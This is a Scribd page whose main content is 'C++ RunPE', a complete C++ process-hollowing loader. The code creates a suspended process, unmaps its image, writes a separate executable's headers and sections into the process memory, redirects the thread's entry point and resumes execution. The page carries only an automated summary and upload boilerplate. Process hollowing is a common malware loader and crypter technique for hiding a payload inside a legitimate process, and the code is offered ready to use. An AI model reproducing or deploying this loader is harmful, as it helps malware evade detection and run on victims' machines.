Scribd
Upload
794 views2 pages

C++ RunPE

This C++ code defines functions to: 1) Load an executable file from disk into memory using memory allocation and file reading functions. 2) Inject and execute the loaded executable in a suspended process by writing the executable's memory pages into the target process's memory space and modifying the process context to start execution. 3) The main function calls these functions to load an executable, get the current process path, and inject/execute the loaded executable in the current process.

Uploaded by

edin18
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
794 views2 pages

C++ RunPE

This C++ code defines functions to: 1) Load an executable file from disk into memory using memory allocation and file reading functions. 2) Inject and execute the loaded executable in a suspended process by writing the executable's memory pages into the target process's memory space and modifying the process context to start execution. 3) The main function calls these functions to load an executable, get the current process path, and inject/execute the loaded executable in the current process.

Uploaded by

edin18
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

#include <Windows.

h> typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAdd ress); LPVOID FileToMem(LPCSTR szFileName) { HANDLE hFile; DWORD dwRead; DWORD dwSize; LPVOID pBuffer = NULL; hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTI NG, NULL, NULL); if (hFile) { dwSize = GetFileSize(hFile, NULL); if (dwSize > 0) { pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); if (pBuffer) { SetFilePointer(hFile, NULL, NULL, FILE_BEGIN); ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL); } } CloseHandle(hFile); } return pBuffer; } void ExecFile(LPSTR szFilePath, LPVOID pFile) { PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INH; PIMAGE_SECTION_HEADER ISH; PROCESS_INFORMATION PI; STARTUPINFOA SI; PCONTEXT CTX; PDWORD dwImageBase; NtUnmapViewOfSection xNtUnmapViewOfSection; LPVOID pImageBase; int Count; IDH = PIMAGE_DOS_HEADER(pFile); if (IDH->e_magic == IMAGE_DOS_SIGNATURE) { INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew); if (INH->Signature == IMAGE_NT_SIGNATURE) { RtlZeroMemory(&SI, sizeof(SI)); RtlZeroMemory(&PI, sizeof(PI)); if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) { CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE)); CTX->ContextFlags = CONTEXT_FULL; if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {

ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, N ULL); if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase) { xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("nt dll.dll"), "NtUnmapViewOfSection")); xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase)); } pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); if (pImageBase) { WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHea ders, NULL); for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++) { ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40)); WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL); } WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeade r.ImageBase), 4, NULL); CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint; SetThreadContext(PI.hThread, LPCONTEXT(CTX)); ResumeThread(PI.hThread); } } } } } VirtualFree(pFile, 0, MEM_RELEASE); } int main() { LPVOID pFile; TCHAR szFilePath[1024]; pFile = FileToMem("C:\\2.exe");// give the adress to the file you want to //exec ute if (pFile) { GetModuleFileNameA(0, LPSTR(szFilePath), 1024); ExecFile(LPSTR(szFilePath), pFile); } return 0; }

You might also like